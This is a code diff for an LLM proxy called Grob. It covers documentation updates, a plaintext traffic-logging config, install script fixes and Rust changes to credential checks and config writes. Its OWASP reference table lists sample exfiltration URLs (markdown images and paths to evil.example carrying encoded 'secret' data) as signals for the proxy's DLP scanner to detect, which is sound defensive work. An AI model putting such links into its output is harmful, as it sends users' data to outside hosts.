-Skip the heuristic classifier when the client already knows how complex
-a request is. `grob_hint` declares a complexity tier for a single
-request, bypassing scoring and feeding directly into provider selection.
+Override the heuristic complexity tier when the client already knows how
+complex a request is. `grob_hint` declares a tier for a single request;
+Grob still runs normal routing, then replaces the computed complexity tier
+before tier fan-out/provider selection.
 
 Three surfaces are equivalent and supported:
 
@@ -86,10 +87,11 @@ the tool **before** the request you want to influence:
 }
 ```
 
-The hint is stored in a one-shot slot on the server and consumed by
-the next dispatch from the same MCP session. After consumption the slot
-is cleared automatically — you must call `grob_hint` again to influence
-a subsequent request.
+The hint is stored in a process-wide one-shot slot on the server and
+consumed by the next dispatch that does not carry a header/body hint. If
+a header or body hint wins for another request, the MCP slot remains
+pending for the next request without its own hint. After consumption you
+must call `grob_hint` again to influence a subsequent request.
 
 ## When to use each surface
 

--- a/docs/how-to/verify-hedge-cancellation-billing.md
+++ b/docs/how-to/verify-hedge-cancellation-billing.md
@@ -1,0 +1,82 @@
+# Verify hedge cancellation billing
+
+Hedged requests are not implemented yet. Use this protocol before enabling or
+shipping any provider-specific hedge config. The goal is to classify what the
+provider bills when Grob cancels the losing leg of a speculative duplicate
+request.
+
+## Preconditions
+
+- Use a paid account where usage and invoices are visible.
+- Run the test on a non-production API key.
+- Disable response caching.
+- Use a deterministic prompt and `temperature = 0`.
+- Use a streaming request so cancellation can happen after the upstream request
+  has started.
+- Run every provider separately; do not infer one provider's behavior from
+  another provider's billing model.
+
+## Classification
+
+| Value | Meaning | Hedging default |
+|---|---|---|
+| `full_refund` | Cancelled leg is not billed beyond negligible connection overhead | allowed |
+| `partial_refund` | Cancelled leg is billed up to generated tokens or a chunk boundary | allowed with extra-cost metric |
+| `no_refund` | Cancelled leg is billed like a full request | disabled unless forced |
+| `unknown` | Billing behavior has not been verified | disabled |
+
+## Test
+
+1. Pick one provider/model pair and record the account's current usage total.
+2. Send five baseline streaming requests without cancellation. Record input
+   tokens, output tokens, duration, and billed amount.
+3. Send five streaming requests with the same prompt, then cancel each stream
+   after the first content chunk is received.
+4. Wait until the provider's usage dashboard or invoice export has caught up.
+5. Compare cancelled-request billing to the baseline:
+   - No material billable usage: `full_refund`.
+   - Lower usage than baseline, but non-zero: `partial_refund`.
+   - Similar usage to baseline: `no_refund`.
+   - Dashboard/API cannot prove the result: `unknown`.
+6. Save the evidence: date, provider, model, account tier, request IDs if
+   available, baseline cost, cancelled cost, and notes.
+
+## Config evidence
+
+Only write a non-`unknown` value after the evidence exists:
+
+```toml
+[hedge.providers.example]
+billing_behavior = "partial_refund"
+verified_date = "2026-06-02"
+evidence = "internal usage export: request ids req_1..req_10"
+```
+
+If the provider changes billing terms, reset the value to `unknown` and rerun
+the test.
+
+## Audit requirements
+
+Every future hedged logical request must record both legs under the same
+logical request id:
+
+```json
+{
+  "event": "hedge_leg_finished",
+  "request_id": "req_logical",
+  "hedge_group_id": "hedge_req_logical",
+  "leg": "secondary",
+  "provider": "openrouter",
+  "model": "anthropic/claude-sonnet-4-6",
+  "winner": false,
+  "cancel_requested": true,
+  "billing_behavior": "partial_refund",
+  "billed_input_tokens": 1234,
+  "billed_output_tokens": 12,
+  "cost_usd": 0.00042
+}
+```
+
+The losing leg is never hidden. Spend records the provider's actual billed cost
+when known; request-latency metrics mark only the winning response as the client
+visible result.

--- a/docs/index.md
+++ b/docs/index.md
@@ -128,6 +128,8 @@ Grob accepts requests in both Anthropic and OpenAI API formats, normalizes them,
 | Topic | File |
 |-------|------|
 | CI/CD release flow (PERT) | [`diagrams/ci-cd-pert.md`](diagrams/ci-cd-pert.md) |
+| Request/dispatch architecture | [`explanation/architecture.md`](explanation/architecture.md) |
+| DLP scanning pipeline | [`reference/dlp.md`](reference/dlp.md) |
 
 ## Version
 

--- a/docs/reference/cli.md
+++ b/docs/reference/cli.md
@@ -8,7 +8,7 @@
 | `--version` | | Print version |
 | `--help` | | Print help |
 
-Shorthand: `grob -- <cmd>` is equivalent to `grob exec -- <cmd>`.
+Use `grob exec -- <cmd>` to launch a command behind the proxy. A bare `grob -- <cmd>` is rejected with a hint so accidental shorthand use does not bypass subcommand parsing.
 
 ## Commands
 
@@ -126,7 +126,6 @@ grob exec -- claude              # Launch Claude Code
 grob exec -- aider               # Launch Aider
 grob exec -- opencode            # Launch OpenCode
 grob exec --no-stop -- my-tool   # Keep proxy running after exit
-grob -- claude                   # Shorthand (trailing args)
 ```
 
 ### `grob run`
@@ -300,12 +299,31 @@ grob logs decrypt --path <trace.jsonl>        # custom trace file
 grob logs decrypt --output <out.jsonl>        # write plaintext to file
 ```
 
-### `grob record` (harness)
+### `grob secrets`
 
-Record live traffic to a tape file for later replay. Counterpart to `grob replay` (not yet surfaced here). Part of the opt-in `harness` feature.
+Manage encrypted upstream provider secrets referenced as `secret:<name>` in provider config.
+
+| Subcommand | Description |
+|------------|-------------|
+| `grob secrets add <name>` | Read a secret value from stdin and store it encrypted |
+| `grob secrets list [--json]` | List stored secret names without revealing values |
+| `grob secrets show <name> [--unsafe-show]` | Show a redacted value unless explicitly revealed |
+| `grob secrets rm <name> [--force]` | Remove a secret |
+| `grob secrets test [name] [--json]` | Probe referencing providers' models endpoints |
 
 ```bash
-grob record --output <tape.jsonl>
+printf '%s\n' "$OPENAI_API_KEY" | grob secrets add openai
+grob secrets list
+grob secrets test openai
+```
+
+### `grob harness` (feature-gated)
+
+Record live traffic to a tape file for later replay. The command is available only when the binary is built with the `harness` feature.
+
+```bash
+grob harness record --output <tape.jsonl>
+grob harness replay --tape <tape.jsonl>
 ```
 
 ### `grob connect`

--- a/docs/reference/configuration.md
+++ b/docs/reference/configuration.md
@@ -236,9 +236,9 @@ Control rate limiting, security headers, body size limits, circuit breakers, and
 ```toml
 [security]
 enabled = true                  # Master switch for all security middleware (default: true)
-rate_limit_rps = 100            # Requests per second per tenant/IP (default: 100)
-rate_limit_burst = 200          # Burst allowance (default: 200)
-max_body_size = 10485760        # Max request body in bytes (default: 10MB)
+rate_limit_rps = 0              # Requests per second per tenant/IP (default: 0 = disabled)
+rate_limit_burst = 0            # Burst allowance (default: 0; used only when rate_limit_rps > 0)
+max_body_size = 0               # Max request body in bytes (default: 0 = unlimited)
 security_headers = true         # Apply OWASP security headers (default: true)
 circuit_breaker = true          # Enable circuit breaker per provider (default: true)
 audit_dir = ""                  # Audit log directory, empty = disabled (default: "")
@@ -250,14 +250,14 @@ adaptive_scoring = false        # Enable scoring-based provider ranking (default
 scoring_latency_alpha = 0.3     # EWMA alpha for latency smoothing, 0.0-1.0 (default: 0.3)
 scoring_window_size = 50        # Rolling window for success rate calculation (default: 50)
 scoring_decay_rate = 0.001      # Score decay per second of inactivity (default: 0.001)
-scoring_persist = false         # Persist scores across restarts (default: false)
+scoring_persist = false         # Reserved; score persistence is not implemented yet
 ```
 
 When `enabled = false`, rate limiting, security headers, and circuit breaker middleware are all skipped. Individual features can also be toggled independently.
 
 The circuit breaker opens after 5 consecutive failures (30s timeout, 3 successes to close). When open, requests skip the provider and fall through to the next mapping.
 
-When `adaptive_scoring = true`, Grob ranks providers by a composite score (success rate, latency, recency). Higher-scoring providers are tried first within the same priority level. Scores decay over time to prevent stale rankings.
+When `adaptive_scoring = true`, Grob ranks providers by a composite score (success rate, latency, recency) and computes `declared_priority / adaptive_factor` before the fallback loop. A degraded provider can move behind a lower-priority healthy provider. Scores are in-memory and decay over time to prevent stale rankings.
 
 ## Config versioning
 

--- a/docs/reference/dlp.md
+++ b/docs/reference/dlp.md
@@ -232,28 +232,31 @@ The following diagram illustrates the full DLP scan pipeline from request ingest
 
 ```mermaid
 flowchart TB
-    req["Incoming Request"] --> secrets["Secret Scanner<br/>(25 builtin rules, Aho-Corasick DFA)"]
-    secrets -->|"found"| action1{"Action?"}
-    action1 -->|redact| redact["Replace with [REDACTED]<br/>+ inject canary token"]
-    action1 -->|block| block["Return 400"]
-    action1 -->|warn| warn["Log + continue"]
-    secrets -->|"clean"| pii["PII Scanner<br/>(email, phone, credit card, IBAN)"]
-    pii --> names["Name Pseudonymizer<br/>(reversible HMAC mapping)"]
-    names --> injection["Injection Detector<br/>(28 languages)"]
-    injection -->|"detected"| block2["Block or warn"]
-    injection -->|"clean"| provider["Forward to provider"]
-    provider --> resp["Response"]
-    resp --> url["URL Exfiltration Scanner"]
-    url --> entropy["Entropy Detector (SPRT)"]
-    entropy --> client["Return to client"]
+    req["Incoming Request"] --> injection["Prompt/tool-result injection checks"]
+    injection -->|"block"| block["Return 400"]
+    injection -->|"continue"| url_in["URL exfiltration block checks"]
+    url_in -->|"block"| block
+    url_in --> names["Name anonymization"]
+    names --> secrets["Secret scanner<br/>(25 builtin rules, Aho-Corasick DFA)"]
+    secrets --> pii["PII scanner<br/>(credit card, IBAN, BIC)"]
+    pii --> provider["Forward sanitized request to provider"]
+    provider --> resp["Provider response"]
+    resp --> denames["Name de-anonymization"]
+    denames --> out_secrets["Response secret scanner"]
+    out_secrets --> out_pii["Response PII scanner"]
+    out_pii --> url_out["URL exfiltration scanner"]
+    url_out --> indirect["Indirect injection scan"]
+    indirect --> client["Return sanitized response to client"]
 ```
 
 ### Request path (input)
 
-1. **Prompt injection detection** (if enabled, `action = block` short-circuits)
-2. **Name anonymization** (real names to pseudonyms)
-3. **Secret scanning** (DFA prefix gate, then regex)
-4. **PII scanning** (credit cards, IBAN, BIC with mathematical validation)
+1. **Prompt injection detection** on request prompts (`action = block` short-circuits)
+2. **Indirect injection detection** on request `tool_result` blocks (`response_action = block` short-circuits)
+3. **URL exfiltration block checks** for request-side links/data URIs
+4. **Name anonymization** (real names to pseudonyms)
+5. **Secret scanning** (DFA prefix gate, then regex)
+6. **PII scanning** (credit cards, IBAN, BIC with mathematical validation)
 
 ### Response path (output)
 
@@ -261,6 +264,7 @@ flowchart TB
 2. **Secret scanning** (catches LLM-generated secrets)
 3. **PII scanning** (catches LLM-generated PII)
 4. **URL exfiltration scanning** (Markdown images/links, data URIs)
+5. **Indirect injection scanning** on response content
 
 ### Streaming path
 

--- a/docs/reference/features.md
+++ b/docs/reference/features.md
@@ -55,7 +55,7 @@ Exhaustive list of grob capabilities, extracted from the codebase. The current v
 | Secret scanning | API keys, tokens, PEM blocks, credentials (25 built-in rules + custom) | redact, block, warn | Request + Response |
 | PII detection | Email, phone, credit card (Luhn), IBAN/BIC | redact, block, warn | Request + Response |
 | Name pseudonymization | Reversible mapping (real names → consistent pseudonyms) | pseudonymize | Request (anonymize) / Response (de-anonymize) |
-| Prompt injection | Pattern-based detection (custom + built-in) | block, warn | Request |
+| Prompt injection | Pattern-based detection (custom + built-in), including indirect response/tool_result scans | block, warn | Request + Response |
 | URL exfiltration | Anti-EchoLeak: domain whitelist/blacklist filtering | block, warn | Response |
 | Canary tokens | Watermark redacted secrets for leak traceability | inject | Request |
 | Streaming DLP | Per-chunk SSE scanning with SPRT cross-boundary detection | redact, block | Streaming responses |

--- a/docs/reference/operations.md
+++ b/docs/reference/operations.md
@@ -89,13 +89,17 @@ The build uses `cargo-chef` for dependency caching and produces a `scratch`-base
 ### Run
 
 ```bash
+podman volume create grob-data
 podman run -d \
   --name grob \
   -p 8080:8080 \
+  -e GROB_CONFIG=/etc/grob/config.toml \
+  -e GROB_HOME=/var/lib/grob \
   -e ANTHROPIC_API_KEY=sk-ant-xxx \
   -e OPENROUTER_API_KEY=sk-or-xxx \
-  -v ~/.grob/config.toml:/config.toml:ro \
-  grob run --json-logs --host 0.0.0.0 --port 8080 --config /config.toml
+  -v ~/.grob/config.toml:/etc/grob/config.toml:ro \
+  -v grob-data:/var/lib/grob \
+  grob:latest
 ```
 
 The default entrypoint is `grob run --json-logs --host 0.0.0.0 --port 8080`. The container runs as UID 65534 (nobody).

--- a/docs/reference/owasp-llm-top10.md
+++ b/docs/reference/owasp-llm-top10.md
@@ -103,9 +103,9 @@ Detection signals:
 
 | Signal | Example |
 |--------|---------|
-| Markdown image with external URL | `![img](https://evil.com/leak?data=secret)` |
+| Markdown image with external URL | `![img](https://evil.example/leak?data=secret)` |
 | Data URI | `![](data:text/plain;base64,c2VjcmV0)` |
-| Base64 segment in URL path | `https://evil.com/exfil/c2VjcmV0Cg==` |
+| Base64 segment in URL path | `https://evil.example/exfil/c2VjcmV0Cg==` |
 | Long query parameter (>200 bytes) | Encoded data appended to query string |
 
 Domain whitelisting and blacklisting with three match modes (`exact`, `suffix`, `glob`) allow fine-tuning.

--- a/docs/reference/routing.md
+++ b/docs/reference/routing.md
@@ -145,6 +145,27 @@ If no providers remain after filtering, the request fails with a routing error:
 
 GDPR filtering also applies to pass-through providers (those with `pass_through = true`).
 
+## Adaptive Provider Scoring
+
+Provider fallback is static by default: mappings are tried by ascending
+`[[models.mappings]].priority`. When `[security] adaptive_scoring = true`, Grob
+re-sorts the selected mappings before dispatch using the provider scorer in
+`src/security/provider_scorer.rs`.
+
+The scorer tracks provider-level success rate, latency EWMA, and recency. It
+integrates with the circuit breaker: open circuits receive score `0.0`, and
+half-open circuits are capped at `0.1`.
+
+Effective ordering is:
+
+```text
+effective_priority = declared_priority / adaptive_factor
+```
+
+Lower values are tried first. This is provider-level scoring, not endpoint-level
+EMA: there is no `[[endpoints]]` schema or `[router.ema]` configuration in the
+current runtime.
+
 ## Full Configuration Example
 
 ```toml

--- a/docs/reference/storage.md
+++ b/docs/reference/storage.md
@@ -143,4 +143,4 @@ All sensitive files created by the storage layer have restricted permissions:
 
 No TOML configuration is needed for the storage layer. The storage directory is `~/.grob/` by default and is determined internally. The encryption key path is always derived from the base directory.
 
-For custom storage placement (e.g., in containers), the path is resolved from the `--data-dir` CLI flag or the `GROB_DATA_DIR` environment variable when available.
+For custom storage placement (e.g., in containers), set `GROB_HOME` to the desired base directory. The container examples use `GROB_HOME=/var/lib/grob`.

--- a/grob-openai-logged.toml
+++ b/grob-openai-logged.toml
@@ -1,0 +1,69 @@
+# grob → Codex (OAuth) — VERSION "LOGGED" : trace TOUT le trafic request/response.
+#
+# Identique à grob-openai.toml, + [server.tracing] qui écrit le CORPS COMPLET de
+# chaque requête entrante ET de chaque réponse sortante (aller + retour) dans un
+# JSONL lisible.
+#
+# Activer (remplace la prod sur le même port 13456) :
+#   grob -c ./grob-openai.toml stop                 # ou kill du PID prod
+#   grob -c ./grob-openai-logged.toml start -d
+#
+# Lire les traces en direct :
+#   tail -f ~/.grob/trace.jsonl | jq .
+#   tail -f ~/.grob/trace.jsonl | jq '{dir:.direction, model:.model, body:.body}'
+
+[server]
+host = "127.0.0.1"
+port = 13456
+log_level = "debug"   # debug = routing/endpoints visibles aussi dans grob.log
+
+[server.timeouts]
+api_timeout_ms = 600000
+connect_timeout_ms = 10000
+
+# >>> LOG TOUT : corps complet des requêtes entrantes + réponses sortantes <<<
+[server.tracing]
+enabled = true              # écrit chaque request/response dans le JSONL
+omit_system_prompt = false  # inclut AUSSI les system prompts (sinon omis car énormes)
+path = "~/.grob/trace.jsonl"
+max_size_mb = 200           # rotation à 200 MB (dev intense = gros volume)
+max_files = 5               # garde 5 fichiers tournants
+compress = false            # rotés non compressés (lisibles directement)
+encrypt = false             # JSONL EN CLAIR → lisible avec jq/tail. Mets true pour
+                            # chiffrer au repos (lecture via `grob logs`).
+
+[[providers]]
+name = "chatgpt-codex"
+provider_type = "openai"
+auth_type = "oauth"
+oauth_provider = "openai-codex"
+enabled = true
+models = []
+service_tier = "priority"
+
+[[models]]
+name = "dev"
+[[models.mappings]]
+provider = "chatgpt-codex"
+actual_model = "gpt-5.5"
+priority = 1
+
+[[models]]
+name = "codex"
+[[models.mappings]]
+provider = "chatgpt-codex"
+actual_model = "gpt-5.3-codex"
+priority = 1
+
+[[models]]
+name = "fast"
+[[models.mappings]]
+provider = "chatgpt-codex"
+actual_model = "gpt-5.4-mini"
+priority = 1
+
+[router]
+default = "dev"
+think = "codex"
+background = "fast"
+websearch = "dev"

--- a/scripts/build-podman.sh
+++ b/scripts/build-podman.sh
@@ -8,7 +8,11 @@ set -euo pipefail
 
 SCRIPT_NAME="$(basename "$0")"
 readonly SCRIPT_NAME
-readonly CONTAINERFILE="Containerfile"
+SCRIPT_DIR="$(cd -- "$(dirname -- "${BASH_SOURCE[0]}")" && pwd)"
+readonly SCRIPT_DIR
+REPO_ROOT="$(cd -- "${SCRIPT_DIR}/.." && pwd)"
+readonly REPO_ROOT
+readonly CONTAINERFILE="${REPO_ROOT}/Containerfile"
 
 usage() {
   cat <<EOF
@@ -71,6 +75,7 @@ main() {
   echo -e "${green}Building Grob container image with Podman...${nc}"
   echo "Tag: ${tag}"
   echo "Containerfile: ${CONTAINERFILE}"
+  echo "Build context: ${REPO_ROOT}"
   echo ""
 
   if ! command -v podman &> /dev/null; then
@@ -81,8 +86,8 @@ main() {
     exit 1
   fi
 
-  if [ ! -f "Cargo.toml" ]; then
-    echo -e "${red}Error: Must run from project root${nc}"
+  if [ ! -f "${REPO_ROOT}/Cargo.toml" ]; then
+    echo -e "${red}Error: could not locate repository root at ${REPO_ROOT}${nc}"
     exit 1
   fi
 
@@ -92,7 +97,7 @@ main() {
     --file "${CONTAINERFILE}" \
     --format oci \
     --layers \
-    .
+    "${REPO_ROOT}"
 
   echo ""
   echo -e "${green}Build successful!${nc}"
@@ -100,12 +105,12 @@ main() {
   echo "Image: grob:${tag}"
   echo ""
   echo "To run (rootless):"
-  echo "  podman play kube grob-kube.yml"
+  echo "  podman play kube ${REPO_ROOT}/deploy/grob-kube.yml"
   echo ""
   echo "Or with Quadlet (systemd):"
   echo "  mkdir -p ~/.config/containers/systemd"
-  echo "  cp grob.container ~/.config/containers/systemd/"
-  echo "  cp grob.volume ~/.config/containers/systemd/"
+  echo "  cp ${REPO_ROOT}/deploy/grob.container ~/.config/containers/systemd/"
+  echo "  cp ${REPO_ROOT}/deploy/grob.volume ~/.config/containers/systemd/"
   echo "  systemctl --user daemon-reload"
   echo "  systemctl --user enable --now grob"
   echo ""

--- a/scripts/install-rootless.sh
+++ b/scripts/install-rootless.sh
@@ -8,6 +8,11 @@ set -euo pipefail
 
 SCRIPT_NAME="$(basename "$0")"
 readonly SCRIPT_NAME
+SCRIPT_DIR="$(cd -- "$(dirname -- "${BASH_SOURCE[0]}")" && pwd)"
+readonly SCRIPT_DIR
+REPO_ROOT="$(cd -- "${SCRIPT_DIR}/.." && pwd)"
+readonly REPO_ROOT
+readonly DEPLOY_DIR="${REPO_ROOT}/deploy"
 readonly GROB_DIR="${HOME}/.grob"
 readonly CONFIG_DIR="${GROB_DIR}/config"
 readonly DATA_DIR="${GROB_DIR}/data"
@@ -83,51 +88,42 @@ main() {
     echo "Creating default config..."
     cat > "${CONFIG_DIR}/config.toml" << 'EOF'
 # Grob Configuration
-# See docs/CONFIGURATION.md for full reference
+# See docs/reference/configuration.md for full reference.
 
 [server]
 host = "0.0.0.0"
 port = 8080
-metrics_port = 9090
+log_level = "info"
+
+[server.timeouts]
+api_timeout_ms = 600000
+connect_timeout_ms = 10000
 
 [auth]
-mode = "api_key"  # or "jwt" or "none"
+mode = "none"
+
+[router]
+default = "placeholder-model"
 
 [security]
-rate_limit_requests_per_second = 100
-rate_limit_burst = 200
-max_body_size = 10485760  # 10MB
+audit_dir = "/var/lib/grob/audit"
 
 [dlp]
 enabled = true
 scan_input = true
 scan_output = true
-
-[audit]
-enabled = true
-directory = "/var/lib/grob/audit"
-encrypt = true
-
-[log]
-level = "info"
-format = "json"
 EOF
   fi
 
   echo "Installing systemd unit files..."
-  if [ -f "grob.container" ]; then
-    cp grob.container "${QUADLET_DIR}/"
-  fi
-
-  if [ -f "grob.volume" ]; then
-    cp grob.volume "${QUADLET_DIR}/"
-  fi
+  cp "${DEPLOY_DIR}/grob.container" "${QUADLET_DIR}/"
+  cp "${DEPLOY_DIR}/grob.volume" "${QUADLET_DIR}/"
 
   echo "Reloading systemd..."
   systemctl --user daemon-reload
 
   echo "Enabling Grob service..."
-  systemctl --user enable grob 2>/dev/null || true
+  systemctl --user enable grob
 
   echo ""
   echo -e "${green}Installation complete!${nc}"

--- a/scripts/mutation-pr.sh
+++ b/scripts/mutation-pr.sh
@@ -50,6 +50,20 @@ emit() {
   fi
 }
 
+select_timeout_bin() {
+  if command -v timeout >/dev/null 2>&1 && timeout --help 2>&1 | grep -q -- '--foreground'; then
+    printf 'timeout\n'
+    return 0
+  fi
+  if command -v gtimeout >/dev/null 2>&1; then
+    printf 'gtimeout\n'
+    return 0
+  fi
+
+  log "GNU timeout not found; install coreutils (gtimeout on macOS) to run mutation PR checks."
+  return 1
+}
+
 in_scope() {
   local file="$1" prefix
   for prefix in "${SCOPE_PREFIXES[@]}"; do
@@ -116,14 +130,19 @@ main() {
     mutants_args+=(--file "${f}")
   done
 
+  local timeout_bin
+  timeout_bin="$(select_timeout_bin)" || {
+    emit "status" "skipped-no-timeout"
+    exit 2
+  }
+
   local start_ts end_ts duration_s exit_code=0
   start_ts="$(date +%s)"
 
-  # `timeout --foreground` so SIGTERM propagates to cargo-mutants and its
-  # cargo subprocesses; `--preserve-status` so we can distinguish a real
-  # cargo-mutants failure from the wall-clock kill.
+  # GNU timeout's `--foreground` lets SIGTERM reach cargo-mutants and its cargo
+  # subprocesses. macOS runners use `gtimeout` from coreutils for the same CLI.
   set +e
-  timeout --foreground --preserve-status "${TIMEOUT_SECONDS}" \
+  "${timeout_bin}" --foreground --preserve-status "${TIMEOUT_SECONDS}" \
     cargo mutants \
       --package grob \
       --timeout "${PER_MUTANT_TIMEOUT}" \

--- a/src/auth/auto_flow.rs
+++ b/src/auth/auto_flow.rs
@@ -76,7 +76,9 @@ pub fn detect_credentials(
             AuthType::OAuth => {
                 if let Some(ref oauth_id) = provider.oauth_provider {
                     let token = token_store.get(oauth_id);
-                    let has_valid_token = token.as_ref().is_some_and(|t| !t.is_expired());
+                    let has_valid_token = token
+                        .as_ref()
+                        .is_some_and(|t| !t.is_expired() && t.needs_reauth != Some(true));
                     if has_valid_token {
                         statuses.push(CredentialStatus::Ready);
                     } else {

--- a/src/cli/config/reliability.rs
+++ b/src/cli/config/reliability.rs
@@ -23,9 +23,10 @@ use serde::{Deserialize, Serialize};
 /// use grob::cli::parse_duration;
 /// use std::time::Duration;
 ///
-/// assert_eq!(parse_duration("30s").unwrap(), Duration::from_secs(30));
-/// assert_eq!(parse_duration("500ms").unwrap(), Duration::from_millis(500));
-/// assert_eq!(parse_duration("2m").unwrap(), Duration::from_secs(120));
+/// assert_eq!(parse_duration("30s")?, Duration::from_secs(30));
+/// assert_eq!(parse_duration("500ms")?, Duration::from_millis(500));
+/// assert_eq!(parse_duration("2m")?, Duration::from_secs(120));
+/// # Ok::<(), String>(())
 /// ```
 pub fn parse_duration(input: &str) -> Result<std::time::Duration, String> {
     let trimmed = input.trim();

--- a/src/commands/doctor.rs
+++ b/src/commands/doctor.rs
@@ -1,5 +1,5 @@
 use super::common::is_grob_healthy;
-use crate::{cli, storage};
+use crate::{auth, cli, storage};
 
 /// Runs diagnostic checks on config, providers, storage, and service health.
 ///
@@ -39,22 +39,47 @@ pub async fn cmd_doctor(config: &cli::AppConfig, config_source: &cli::ConfigSour
     // 3. Providers with credentials
     let enabled_providers: Vec<_> = config.providers.iter().filter(|p| p.is_enabled()).collect();
     let total = enabled_providers.len();
-    let with_keys = enabled_providers
+    let token_store = storage::GrobStore::open(&storage::GrobStore::default_path())
+        .ok()
+        .and_then(|store| auth::TokenStore::with_store(std::sync::Arc::new(store)).ok())
+        .unwrap_or_else(auth::TokenStore::new_empty);
+    let credential_statuses = auth::auto_flow::detect_credentials(&config.providers, &token_store);
+    let ready = credential_statuses
         .iter()
-        .filter(|p| p.api_key.is_some() || p.oauth_provider.is_some())
+        .filter(|s| matches!(s, auth::auto_flow::CredentialStatus::Ready))
         .count();
     if total == 0 {
         println!("  ❌ No providers configured");
         println!("     → run: grob setup --edit providers");
         errors += 1;
-    } else if with_keys < total {
-        println!("  ⚠️  Providers: {}/{} have credentials", with_keys, total);
+    } else if ready < total {
+        println!(
+            "  ⚠️  Providers: {}/{} have usable credentials",
+            ready, total
+        );
+        for status in &credential_statuses {
+            match status {
+                auth::auto_flow::CredentialStatus::MissingOAuth {
+                    provider_name,
+                    oauth_provider_id,
+                    ..
+                } => println!(
+                    "     - {}: OAuth token '{}' missing, expired, or needs re-auth",
+                    provider_name, oauth_provider_id
+                ),
+                auth::auto_flow::CredentialStatus::MissingApiKey {
+                    provider_name,
+                    env_var,
+                } => println!("     - {}: ${} not set", provider_name, env_var),
+                auth::auto_flow::CredentialStatus::Ready => {}
+            }
+        }
         println!("     → run: grob connect");
         warnings += 1;
     } else {
         println!(
-            "  ✅ Providers: {}/{} configured with credentials",
-            with_keys, total
+            "  ✅ Providers: {}/{} configured with usable credentials",
+            ready, total
         );
     }
 

--- a/src/commands/setup/migrate.rs
+++ b/src/commands/setup/migrate.rs
@@ -68,7 +68,8 @@ pub(in crate::commands::setup) fn write_migrated(path: &Path, value: &Value) -> 
         std::fs::copy(path, &backup).context("failed to back up config before migration")?;
     }
     let serialized = toml::to_string_pretty(value).context("failed to serialize migrated TOML")?;
-    std::fs::write(path, serialized).context("failed to write migrated config")?;
+    crate::storage::atomic::write_atomic(path, serialized.as_bytes())
+        .context("failed to write migrated config")?;
     Ok(())
 }
 

--- a/src/commands/setup/mod.rs
+++ b/src/commands/setup/mod.rs
@@ -375,7 +375,8 @@ async fn run_edit_section(config_path: &Path, section: &str, flags: &SetupFlags)
             let backup = config_path.with_extension("toml.backup");
             std::fs::copy(config_path, &backup)?;
         }
-        std::fs::write(config_path, toml::to_string_pretty(&config)?)?;
+        let serialized = toml::to_string_pretty(&config)?;
+        crate::storage::atomic::write_atomic(config_path, serialized.as_bytes())?;
         println!("  Config updated: {}", config_path.display());
     } else {
         println!("  Dry run — no changes written.");

--- a/src/commands/setup/writer.rs
+++ b/src/commands/setup/writer.rs
@@ -170,7 +170,8 @@ pub(in crate::commands::setup) fn apply_compliance(
             patch(config, "dlp", &[("enabled", true.into())])?;
         }
         Compliance::EuGdpr => {
-            std::fs::write(path, toml::to_string_pretty(config)?)?;
+            let serialized = toml::to_string_pretty(config)?;
+            crate::storage::atomic::write_atomic(path, serialized.as_bytes())?;
             crate::preset::overlay_compliance("eu-ai-act", path)?;
             return Ok(true);
         }
@@ -235,7 +236,8 @@ pub(in crate::commands::setup) fn write_config(choices: &Choices, path: &Path) -
         )?;
     }
 
-    std::fs::write(path, toml::to_string_pretty(&config)?)?;
+    let serialized = toml::to_string_pretty(&config)?;
+    crate::storage::atomic::write_atomic(path, serialized.as_bytes())?;
     Ok(())
 }
 

--- a/src/features/dlp/pii.rs
+++ b/src/features/dlp/pii.rs
@@ -106,11 +106,14 @@ impl PiiScanner {
     /// use grob::features::dlp::config::PiiConfig;
     /// use grob::features::dlp::pii::PiiScanner;
     ///
-    /// let scanner = PiiScanner::from_config(&PiiConfig::default()).unwrap();
+    /// let Some(scanner) = PiiScanner::from_config(&PiiConfig::default()) else {
+    ///     return Ok::<(), Box<dyn std::error::Error>>(());
+    /// };
     /// // Digit run >= 8 → might contain a card number
     /// assert!(scanner.might_contain_pii("card 4111111111111111 here"));
     /// // Pure prose → rejected
     /// assert!(!scanner.might_contain_pii("hello world, no numbers"));
+    /// # Ok::<(), Box<dyn std::error::Error>>(())
     /// ```
     #[inline]
     pub fn might_contain_pii(&self, text: &str) -> bool {

--- a/src/lib.rs
+++ b/src/lib.rs
@@ -53,12 +53,13 @@ pub fn home_dir() -> Option<PathBuf> {
 ///
 /// ```
 /// use grob::expand_tilde;
+/// use std::path::PathBuf;
 ///
 /// // Absolute paths pass through unchanged.
-/// assert_eq!(grob::expand_tilde("/etc/grob.toml").to_str().unwrap(), "/etc/grob.toml");
+/// assert_eq!(expand_tilde("/etc/grob.toml"), PathBuf::from("/etc/grob.toml"));
 ///
 /// // Non-tilde relative paths pass through unchanged.
-/// assert_eq!(grob::expand_tilde("relative/path").to_str().unwrap(), "relative/path");
+/// assert_eq!(expand_tilde("relative/path"), PathBuf::from("relative/path"));
 /// ```
 pub fn expand_tilde(path: &str) -> PathBuf {
     if let Some(rest) = path.strip_prefix("~/") {

--- a/src/models/extensions.rs
+++ b/src/models/extensions.rs
@@ -34,4 +34,8 @@ pub struct RequestExtensions {
     pub top_logprobs: Option<u32>,
     /// Requested service tier (`"auto"`, `"default"`, `"flex"`).
     pub service_tier: Option<String>,
+    /// Optional author name for the hoisted OpenAI system message.
+    pub openai_system_name: Option<String>,
+    /// Optional author names for canonical messages, indexed by message position.
+    pub openai_message_names: Vec<Option<String>>,
 }

--- a/src/pricing.rs
+++ b/src/pricing.rs
@@ -353,9 +353,13 @@ static PRICING_MAP: std::sync::LazyLock<
 ///
 /// ```
 /// use grob::pricing::pricing;
-/// let p = pricing("claude-opus-4-7").unwrap();
+///
+/// let Some(p) = pricing("claude-opus-4-7") else {
+///     return Err("known model should have pricing".into());
+/// };
 /// assert!(p.input_per_million > 0.0);
 /// assert!(pricing("unknown-model-xyz").is_none());
+/// # Ok::<(), Box<dyn std::error::Error>>(())
 /// ```
 pub fn pricing(model: &str) -> Option<&'static ModelPricing> {
     // Try exact match first (O(1), no allocation)

--- a/src/providers/openai/transform.rs
+++ b/src/providers/openai/transform.rs
@@ -82,6 +82,7 @@ pub(crate) fn transform_request(
         openai_messages.push(OpenAIMessage {
             role: "system".to_string(),
             content: Some(OpenAIContent::String(system_text)),
+            name: request.extensions.openai_system_name.clone(),
             reasoning: None,
             tool_calls: None,
             tool_call_id: None,
@@ -95,7 +96,7 @@ pub(crate) fn transform_request(
     // messages array to prevent duplicate system messages in the OpenAI
     // payload (audit Bug #3 — clients may send `[user, system, assistant]`
     // and grob previously emitted two `role:"system"` messages).
-    for msg in &request.messages {
